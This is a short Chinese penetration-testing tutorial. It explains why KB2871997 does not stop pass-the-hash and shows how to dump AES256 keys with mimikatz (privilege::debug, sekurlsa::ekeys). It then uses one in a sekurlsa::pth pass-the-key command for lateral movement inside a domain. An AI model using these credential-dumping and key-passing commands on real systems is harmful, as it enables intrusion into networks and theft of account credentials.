kb2871997
在服务器打了kb2871997 补丁后,据说可以一定程度上的防止Pass The hash 哈希传递,但是这个大佬验证后为假的,拒绝PTH的并不是kb2871997 ,而是存在UAC或者其他校验拒绝,比如SID为500的管理员用户同样可以传递Hash,
UAC是window Vista的新安全组件,2003版本是没有的。所以2003管理组内的用户还是可以网络登录的,而03之后的win7 win8 win10 2008 2012 2012R2 2016 2019 本地都是只能sid为500的允许网络远程访问!
如下图所示win7连接作为测试
连接administratorsid =500 成功
连接win7 sid =1000 失败
那么综上所述,PTH只有SID=500是能成功的,SID=other失败
那么设置一个场景:
1、我们拿到了A主机管理员权限,
2、并且导出其他hash,解密不出来
3、PTH尝试后,失败。
Pass The Key
可在NTLM认证被禁止的情况下用来实现类似pth的功能,如域内
privilege::debug
sekurlsa::ekeys
获取到AES256_HMAC后
PTK代理PTH
这里虽然还是叫pth 但是实际上是使用了aes256 的 key 来进行特殊的的hash传递,称为pth
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:hacker.com /aes256:9133187362db3b28a28532d8ca546c2500b903a7fb230076b96a8defe955a164"
如果失败的话,是因为没有安装kb2871997